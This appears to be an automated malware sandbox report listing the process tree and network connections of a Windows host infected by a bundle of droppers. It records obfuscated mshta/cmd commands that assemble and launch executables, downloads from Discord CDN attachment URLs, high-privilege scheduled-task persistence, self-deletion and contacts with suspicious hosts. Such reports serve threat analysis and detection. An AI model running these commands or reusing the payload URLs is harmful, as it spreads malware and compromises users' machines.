C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe

"C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe"

C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe

"C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe

"C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2260 -s 1508

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 888

C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe

"C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 488

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscript:ClOse ( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )

C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe

"C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe"

C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe

"C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe"

C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe

"C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"

C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe

"C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe"

C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe

"C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe"

C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe

"C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe"

C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe

"C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe"

C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe

"C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe"

C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe

"C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe"

C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe

"C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe"

C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe

"C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe"

C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe

"C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe"

C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe

"C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe"

C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe

"C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe"

C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe

"C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe"

C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe

"C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EChO "

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2424 -s 1532

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"

C:\Program Files (x86)\Company\NewProduct\inst2.exe

"C:\Program Files (x86)\Company\NewProduct\inst2.exe"

C:\Program Files (x86)\Company\NewProduct\rtst1039.exe

"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe

"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""

C:\Users\Admin\AppData\Roaming\1112626.exe

"C:\Users\Admin\AppData\Roaming\1112626.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\1112626.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Users\Admin\AppData\Roaming\211320.exe

"C:\Users\Admin\AppData\Roaming\211320.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\1112626.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\1112626.exe" ) do taskkill -IM "%~NxL" -F

C:\Windows\SysWOW64\control.exe

control.exe .\PcAKEO.F

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F

C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe

"C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe

..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F

C:\Windows\SysWOW64\taskkill.exe

taskkill -IM "1112626.exe" -F

C:\Users\Admin\AppData\Roaming\6555363.exe

"C:\Users\Admin\AppData\Roaming\6555363.exe"

C:\Users\Admin\AppData\Roaming\1231861.exe

"C:\Users\Admin\AppData\Roaming\1231861.exe"

C:\Users\Admin\AppData\Roaming\3771250.exe

"C:\Users\Admin\AppData\Roaming\3771250.exe"

C:\Users\Admin\AppData\Roaming\2114247.exe

"C:\Users\Admin\AppData\Roaming\2114247.exe"

C:\Users\Admin\AppData\Roaming\329851.exe

"C:\Users\Admin\AppData\Roaming\329851.exe"

C:\Users\Admin\AppData\Roaming\8035666.exe

"C:\Users\Admin\AppData\Roaming\8035666.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y ..\VYGDVP.ly

C:\Users\Admin\AppData\Roaming\5341808.exe

"C:\Users\Admin\AppData\Roaming\5341808.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Users\Admin\AppData\Roaming\679400.exe

"C:\Users\Admin\AppData\Roaming\679400.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\5341808.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\5341808.exe" ) do taskkill -IM "%~NxL" -F

C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe

..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F

C:\Windows\SysWOW64\taskkill.exe

taskkill -IM "5341808.exe" -F

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828757600858142/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )

C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe

"C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"

C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp" /SL5="$10404,506127,422400,C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe" & del C:\ProgramData\*.dll & exit

C:\Users\Admin\AppData\Local\Temp\28846\18.exe

18.exe

C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe

"C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe" /S /UID=2709

C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe

"C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe"

C:\Users\Admin\AppData\Local\Temp\28846\Transmissibility.exe

Transmissibility.exe

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y ..\VYGDVP.ly

C:\Windows\SysWOW64\taskkill.exe

taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "" "" "" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Users\Admin\AppData\Local\Temp\C48F.exe

C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe

"C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe"

C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe

"C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe"

C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe

"C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe"

C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe

"C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe"

C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe

"C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"

C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp" /SL5="$A0058,506127,422400,C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"

C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe

"C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe"

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe

"C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe

"C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe" /S /UID=2709

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\AppData\Local\Temp\F4D8.exe

C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe

"C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 149.28.253.196:443 www.listincode.com tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 45.144.225.243:80 45.144.225.243 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 g-localdevice.biz udp
US 8.8.8.8:53 hh3valve.com udp
US 194.195.211.98:80 hh3valve.com tcp
US 8.8.8.8:53 webdeadshare24.me udp
US 104.21.60.86:443 webdeadshare24.me tcp
US 8.8.8.8:53 iplogger.org udp
DE 5.9.162.45:443 iplogger.org tcp
DE 5.9.162.45:443 iplogger.org tcp
US 8.8.8.8:53 time.windows.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
FR 91.121.67.60:51630 tcp
NL 20.101.57.9:123 time.windows.com udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.243:80 45.144.225.243 tcp
US 8.8.8.8:53 g-localdevice.biz udp
NL 212.193.30.29:80 212.193.30.29 tcp
US 8.8.8.8:53 webdatingcompany.me udp
US 104.21.50.241:443 webdatingcompany.me tcp
DE 5.9.162.45:443 iplogger.org tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.204.112:443 t.gogamec.com tcp
SC 185.215.113.45:80 185.215.113.45 tcp
SC 185.215.113.45:80 185.215.113.45 tcp
US 8.8.8.8:53 feeds.feedburner.com udp
US 142.251.39.110:443 feeds.feedburner.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 mastodon.online udp
FI 95.216.4.252:443 mastodon.online tcp
DE 5.9.162.45:443 iplogger.org tcp
US 8.8.8.8:53 host-file-host0.com udp
US 8.8.8.8:53 l-farlab.com udp
US 162.213.251.105:443 l-farlab.com tcp
DE 5.9.162.45:443 iplogger.org tcp
DE 5.9.162.45:443 iplogger.org tcp
NL 45.144.225.243:80 45.144.225.243 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
NL 212.193.30.29:80 212.193.30.29 tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
NL 2.56.59.42:80 2.56.59.42 tcp
US 8.8.8.8:53 privacytoolzfor-you7000.top udp
US 47.254.33.79:80 privacytoolzfor-you7000.top tcp
US 47.254.33.79:80 privacytoolzfor-you7000.top tcp
NL 193.56.146.36:80 193.56.146.36 tcp
US 8.8.8.8:53 www.asbizhi.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 lacasadicavour.com udp
RU 212.193.50.94:80 lacasadicavour.com tcp
NL 103.155.93.165:80 www.asbizhi.com tcp
US 8.8.8.8:53 dataonestorage.com udp
RU 212.193.50.94:80 lacasadicavour.com tcp
US 8.8.8.8:53 tg8.cllgxx.com udp
US 85.209.157.230:80 tg8.cllgxx.com tcp
US 8.8.8.8:53 inchtagbed667834.s3.eu-west-1.amazonaws.com udp
IE 52.218.80.91:80 inchtagbed667834.s3.eu-west-1.amazonaws.com tcp
US 8.8.8.8:53 charirelay.xyz udp
LV 94.140.112.68:81 charirelay.xyz tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 172.67.204.112:443 t.gogamec.com tcp
DE 5.9.162.45:443 iplogger.org tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 host-file-host0.com udp
IE 52.218.80.91:443 inchtagbed667834.s3.eu-west-1.amazonaws.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 toa.mygametoa.com udp
US 8.8.8.8:53 toa.mygametoa.com udp
KR 34.64.183.91:53 toa.mygametoa.com udp
DE 5.9.162.45:443 iplogger.org tcp
NL 193.56.146.64:65441 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 host-file-host0.com udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 194.195.211.98:80 hh3valve.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 g-localdevice.biz udp
US 8.8.8.8:53 staticimg.aieeaag.com udp
US 8.8.8.8:53 freshstart-upsolutions.me udp
US 104.21.51.253:443 freshstart-upsolutions.me tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
NL 136.144.41.178:9295 tcp
NL 136.144.41.178:9295 tcp
NL 45.14.49.184:38924 tcp
